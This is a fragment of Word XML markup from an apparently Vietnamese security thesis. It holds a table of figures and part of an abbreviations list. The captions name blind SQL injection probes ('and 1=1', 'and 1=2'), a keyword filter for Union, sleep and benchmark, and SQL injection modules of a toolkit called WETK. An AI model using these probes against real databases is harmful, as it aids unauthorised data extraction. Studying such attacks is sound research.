          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>67</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7" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 25: Hiển thị toàn bộ danh sách nếu không có mức điểm</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436437 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>67</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8" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 26: Hiển thị những thí sinh có điểm thi lớn h</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ơ</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>n 5</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436438 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>67</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39" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 27: Đoạn code lọc từ khóa Union, sleep, benchmark….</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436439 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>68</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0" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 28: Trả về toàn bộ danh sách khi điều kiện là True (and 1=1).</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436440 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>68</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1" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 29: Không trả về kết quả khi điều kiện là False (and 1=2).</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436441 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>68</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2" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 30: Kiến trúc của WETK</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436442 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>70</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3" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 31: H</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ư</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ớng dẫn sử dụng WETK</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436443 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>70</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4" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 32: Hiển thị các module đã có của WETK</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436444 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>71</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5" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 33: Hiển thị các option của module sqlinjection.blind</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436445 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>78</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6" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 34: Hiển thị các option của module sqlinjection.binary_search</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436446 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>79</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7" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 35: Hiển thị các option của module sqlinjection.bit_shift</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436447 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>79</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8" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 36: Biểu đồ số l</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ư</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ợng yêu cầu và thời gian của từng ph</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ươ</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ng pháp (tr</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ư</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ờng hợp độ dài là 1)</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436448 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>84</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E7327E" w:rsidRDefault="00357C7D" w:rsidP="00E7327E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc458436449" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 37:</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Biểu đồ số l</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ư</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ợng yêu cầu và thời gian của từng ph</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ươ</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ng pháp (tr</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ư</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ờng hợp độ dài là 27)</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436449 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>84</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E0ED1" w:rsidRDefault="003308DA" w:rsidP="00587B19">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00587B19" w:rsidRDefault="00587B19">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0ED1" w:rsidRPr="003E0ED1" w:rsidRDefault="00587B19" w:rsidP="00760373">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc459374305"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DANH MỤC TỪ VIẾT TẮT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="821"/>
        <w:gridCol w:w="2358"/>
        <w:gridCol w:w="6109"/>
      </w:tblGrid>
      <w:tr w:rsidR="00643484" w:rsidRPr="002B0849" w:rsidTr="0058383C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="828" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00643484" w:rsidRPr="002B0849" w:rsidRDefault="003E0ED1" w:rsidP="002B0849">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br w:type="page"/>
            </w:r>
            <w:r w:rsidR="00643484" w:rsidRPr="002B0849">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>STT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00643484" w:rsidRPr="002B0849" w:rsidRDefault="00643484" w:rsidP="002B0849">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t>Từ viết tắt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00643484" w:rsidRPr="002B0849" w:rsidRDefault="00643484" w:rsidP="002B0849">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t>Giải nghĩa</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sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B0849">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidRDefault="00A675EA" w:rsidP="00501C5D">
            <w:pPr>
              <w:suppressAutoHyphens w:val="0"/>
              <w:spacing w:line="252" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B0849">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Application Programming Interface</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ASP</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Active Server Page</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ATTT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidRDefault="00A675EA">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An toàn thông tin</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CMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidRDefault="00F45E2E">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Content Management System</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CSDL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidRDefault="00A675EA">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Cơ sở dữ liệu</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CVE</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Common Vulnerabilities and Exposures</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CWE</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Common Weakness Enumeration</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DBMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidRDefault="00A675EA">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Data Base Management System</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sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B0849">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>DDD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidRDefault="00501C5D" w:rsidP="00501C5D">
            <w:pPr>
              <w:suppressAutoHyphens w:val="0"/>
              <w:spacing w:line="252" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B0849">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Domain Driven Design</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sz w:val="26"/>
